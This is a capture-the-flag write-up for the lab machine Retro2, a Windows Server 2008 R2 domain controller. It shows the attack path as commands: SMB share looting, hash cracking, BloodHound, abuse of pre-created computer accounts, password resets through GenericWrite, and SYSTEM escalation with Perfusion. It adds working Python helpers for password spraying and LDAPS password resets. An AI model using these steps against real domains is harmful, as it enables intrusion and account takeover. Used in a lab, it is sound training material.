VL-Retro2

Nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  syn-ack ttl 127 Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Host script results:
| smb2-time:
|   date: 2025-03-11T18:29:27
|_  start_date: 2025-03-11T18:27:35
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 22122/tcp): CLEAN (Timeout)
|   Check 2 (port 47750/tcp): CLEAN (Timeout)
|   Check 3 (port 39335/udp): CLEAN (Timeout)
|   Check 4 (port 23565/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2025-03-11T19:29:28+01:00
|_clock-skew: mean: -2h19m57s, deviation: 34m36s, median: -1h59m59s

The SMB banner identifies BLN01 as a Windows Server 2008 R2 Datacenter SP1 (build 7601) domain controller for retro2.vl: "Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)". Note the clock skew of roughly two hours that nmap reports: Kerberos tolerates only five minutes by default, so sync the local clock against the DC before any Kerberos-based step.

Fast exploit

The target is Windows Server 2008 R2, so the quickest wins are the classic domain controller bugs for this generation. Running the netexec checks for them reports the DC as vulnerable to both Zerologon (CVE-2020-1472) and noPac (CVE-2021-42278 / CVE-2021-42287):

nxc smb BLN01.retro2.vl -M zerologon
nxc smb BLN01.retro2.vl -u "user" -p "pass" -M nopac

Two caveats: the zerologon module only checks the Netlogon handshake, and actually exploiting the bug resets the DC's machine account password, which breaks the domain until that password is restored; the nopac module needs a valid domain credential (the "user"/"pass" above are placeholders), which we do not have at this point. There are plenty of tutorials for both exploits, so this post focuses on the "intended way".

Foothold

Guest access works on SMB, so we start by listing the shares:

netexec smb 10.10.100.199 -u 'guest' -p '' --shares

The Public share is readable as guest. Its DB folder contains a single file, staff.accdb, which we download from within the smbclient session:

smbclient //10.10.100.199/Public -U 'guest'
get staff.accdb

An .accdb file is an Access 2007+ database. This one is password protected, so we extract the hash with office2john and crack it with john:

office2john staff.accdb > hash.txt
john --format=office --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The password is class08. Opening the database with it, we find a set of domain credentials:

ldapreader:<REDACTED>

Bloodhound

bloodhound-python -u "ldapreader" -p "<REDACTED>" -d retro2.vl -dc BLN01.retro2.vl -ns 10.10.70.92 -c ALL --zip

OR

nxc ldap retro2.vl -u 'ldapreader' -p '<REDACTED>' --bloodhound --dns-server <ip> -c All --dns-tcp

Either command produces a zip file that we import into BloodHound to find the exploitation path. ldapreader itself has no useful rights, but the graph shows a computer account, FS01$, with GenericWrite over another computer account, ADMWS01$, which in turn can add members to the Services group.

User

First we look at the computer account FS01$. Computer accounts that were pre-created with the "Assign this computer account as a pre-Windows 2000 computer" option get a well-known initial password: the lowercase computer name without the trailing $ (this xmco post explains why: https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/). So we try fs01 as the password for fs01$:

nxc smb retro2.vl -u 'fs01$' -p 'fs01'

netexec does not report a clean login but STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, which is the expected result for such an account: the password is correct, but the account cannot be used for authentication until its password has been changed. Since we know the current password we can change it ourselves over SAMR:

impacket-changepasswd 'retro2.vl/fs01$':'fs01'@retro2.vl -newpass StrongP@ss1234 -dc-ip BLN01.retro2.vl -p rpc-samr
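The same idea generalises to every computer account in the domain. The following Python helper is an added example, not part of the original write-up: it derives the pre-Windows 2000 candidate password for a list of computer accounts and classifies netexec's result lines, separating the "password correct but must change" case from a plain logon failure. The three sample output lines are constructed for the example (fs01$ is the account from this box, admws01$/ws02$ results are hypothetical), and the exact spacing of real nxc output as well as the command strings it emits are assumptions about the tools.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# netexec SMB output as it appears in a terminal. Constructed for this
# example, not captured from the lab.
SAMPLE_NXC_OUTPUT = """\
SMB  10.10.70.92  445  BLN01  [-] retro2.vl\\fs01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB  10.10.70.92  445  BLN01  [-] retro2.vl\\admws01$:admws01 STATUS_LOGON_FAILURE
SMB  10.10.70.92  445  BLN01  [+] retro2.vl\\ws02$:ws02
"""

# [+]/[-], then DOMAIN\user:password and an optional NT status word.
RESULT_RE = re.compile(
    r"\[(?P<mark>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>\S+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?"
)


def precreated_candidate(sam_account_name: str) -> str:
    """Initial password of a pre-Windows 2000 computer account: the lowercase
    computer name without the trailing $. The 14-character cap is the LM-era
    limit and is an assumption for names longer than that."""
    return sam_account_name.rstrip("$").lower()[:14]


def spray_plan(sam_account_names: List[str]) -> List[str]:
    """One 'user:password' guess per computer account. Split into a user file
    and a password file and run nxc with --no-bruteforce so each user is
    tried only with its own candidate."""
    return [f"{name}:{precreated_candidate(name)}" for name in sam_account_names]


@dataclass
class SprayResult:
    user: str
    password: str
    verdict: str  # valid | valid_must_change | invalid | unknown


def classify(line: str) -> Optional[SprayResult]:
    """Map one nxc line to a verdict. STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
    is the interesting case: the password is right, but the account cannot
    log on until its password is changed."""
    m = RESULT_RE.search(line)
    if not m:
        return None
    status = m.group("status") or ""
    if m.group("mark") == "+":
        verdict = "valid"
    elif status == "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT":
        verdict = "valid_must_change"
    elif status == "STATUS_LOGON_FAILURE":
        verdict = "invalid"
    else:
        verdict = "unknown"
    return SprayResult(m.group("user"), m.group("password"), verdict)


def classify_all(output: str) -> List[SprayResult]:
    return [r for r in (classify(line) for line in output.splitlines()) if r]


def next_step(result: SprayResult, domain: str, dc: str, new_password: str) -> str:
    """Command to run next for a hit: change the password of a must-change
    account (the DC allows that with the current one), or reuse the creds."""
    if result.verdict == "valid_must_change":
        return (f"impacket-changepasswd '{domain}/{result.user}':'{result.password}'@{domain} "
                f"-newpass {new_password} -dc-ip {dc} -p rpc-samr")
    if result.verdict == "valid":
        return f"nxc smb {dc} -u '{result.user}' -p '{result.password}'"
    return ""


if __name__ == "__main__":
    print(spray_plan(["FS01$", "ADMWS01$", "WS02$"]))
    for r in classify_all(SAMPLE_NXC_OUTPUT):
        print(r, next_step(r, "retro2.vl", "BLN01.retro2.vl", "StrongP@ss1234") or "-")
```

Feed the plan to nxc as a user list and a password list with --no-bruteforce and --continue-on-success, then pipe the output through classify_all; anything marked valid_must_change is a foothold waiting for a password change.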

GenericWrite

With control over FS01$ we can take advantage of the GenericWrite it holds over ADMWS01$, which we identified in BloodHound. GenericWrite on a computer account is typically abused with one of the following techniques:

  • Shadow Credentials (writing msDS-KeyCredentialLink), which needs a Windows Server 2016 or later DC with PKINIT support
  • Targeted Kerberoasting, which only pays off if the target's password is crackable, and machine account passwords are long and random
  • Resource-Based Constrained Delegation (writing msDS-AllowedToActOnBehalfOfOtherIdentity), which needs a Windows Server 2012 or later DC

None of these work against a Windows Server 2008 R2 domain controller, so we take another route: the write right also covers the unicodePwd attribute, which lets us simply reset the password of ADMWS01$ (big thanks to serotonin for this exploitation path: https://seriotonctf.github.io/2024/08/25/Retro2-Vulnlab/):

net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%StrongP@ss1234 -S BLN01.retro2.vl
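The net rpc command above does the reset over SAMR. As an added example (not the write-up's own method), the same unicodePwd write can be done directly over LDAPS with the ldap3 library; the value format is the part people get wrong, so the helpers below build it and the two modify shapes AD accepts. Names such as the target DN are assumptions to be filled in from the BloodHound data; port 636 is the LDAPS port seen in the scan.

```python
import ssl
from typing import Tuple


def encode_unicode_pwd(new_password: str) -> bytes:
    """AD only accepts unicodePwd values that are the password wrapped in
    double quotes and encoded as UTF-16LE (so 'a' becomes b'"\\x00a\\x00"\\x00')."""
    return f'"{new_password}"'.encode("utf-16-le")


def reset_change(new_password: str) -> dict:
    """ldap3 modify() payload for an administrative reset: one REPLACE, no
    old password needed. ('MODIFY_REPLACE' is the value of ldap3.MODIFY_REPLACE.)"""
    return {"unicodePwd": [("MODIFY_REPLACE", [encode_unicode_pwd(new_password)])]}


def self_change(old_password: str, new_password: str) -> dict:
    """Payload for a self-service change, which needs the old password but no
    reset right: DELETE the old value and ADD the new one in a single modify."""
    return {"unicodePwd": [
        ("MODIFY_DELETE", [encode_unicode_pwd(old_password)]),
        ("MODIFY_ADD", [encode_unicode_pwd(new_password)]),
    ]}


def reset_over_ldaps(dc: str, bind_user: str, bind_password: str,
                     target_dn: str, new_password: str) -> Tuple[bool, dict]:
    """Bind with NTLM over LDAPS and write the attribute. AD refuses unicodePwd
    writes on an unencrypted connection, hence port 636. bind_user is in
    'DOMAIN\\user' form, e.g. 'retro2.vl\\fs01$'. Returns ldap3's success flag
    and result dict (result code 0 means the password was set)."""
    import ldap3  # imported here so the pure helpers above need no dependency
    tls = ldap3.Tls(validate=ssl.CERT_NONE)  # lab DC uses a self-signed certificate
    server = ldap3.Server(dc, port=636, use_ssl=True, tls=tls, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=bind_user, password=bind_password,
                            authentication=ldap3.NTLM, auto_bind=True)
    try:
        ok = conn.modify(target_dn, reset_change(new_password))
        return ok, dict(conn.result)
    finally:
        conn.unbind()
```

Usage against this box would be reset_over_ldaps('BLN01.retro2.vl', 'retro2.vl\\fs01$', 'StrongP@ss1234', '<DN of ADMWS01$>', 'Passw0rd1'). Two practical notes: an unwillingToPerform result usually means the connection was not encrypted or the new password violates policy, and a 2008 R2 host may only offer TLS 1.0, so a current OpenSSL may need its security level lowered (for example ldap3.Tls(..., ciphers="DEFAULT@SECLEVEL=0")), the LDAP counterpart of xfreerdp's /tls-seclevel:0.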

AddMember

ADMWS01$ can add members to the Services group (the AddMember edge in BloodHound), so we use it to add the user we own, ldapreader, to that group:

net rpc group addmem "Services" "ldapreader" -U "retro2.vl"/"ADMWS01$"%"Passw0rd1" -S BLN01.retro2.vl

That membership is what gives ldapreader Remote Desktop access, so we can now RDP to the DC. The /tls-seclevel:0 option is needed because the 2008 R2 host only offers TLS versions that current OpenSSL security levels reject:

xfreerdp /v:10.10.70.92 /u:'ldapreader' /p:'<REDACTED>' /d:retro2.vl /tls-seclevel:0

Priv Escalation

itm4n has a great pair of blog posts on a no-fix local privilege escalation in older Windows versions such as Windows 7 and Server 2008 R2: the registry keys of the RpcEptMapper and DnsCache services allow any authenticated user to create a Performance subkey, and the DLL registered there is loaded as SYSTEM when WMI performance data is queried.
https://itm4n.github.io/windows-registry-rpceptmapper-eop/
https://itm4n.github.io/windows-registry-rpceptmapper-exploit/

His tool Perfusion automates the whole chain. Run from the RDP session, it gives us a SYSTEM shell (-c is the command to run, -i makes it interactive):

.\Perfusion.exe -c cmd -i

https://api.vulnlab.com/api/v1/share?id=bec17ffc-be95-49d1-915e-35c53826e85f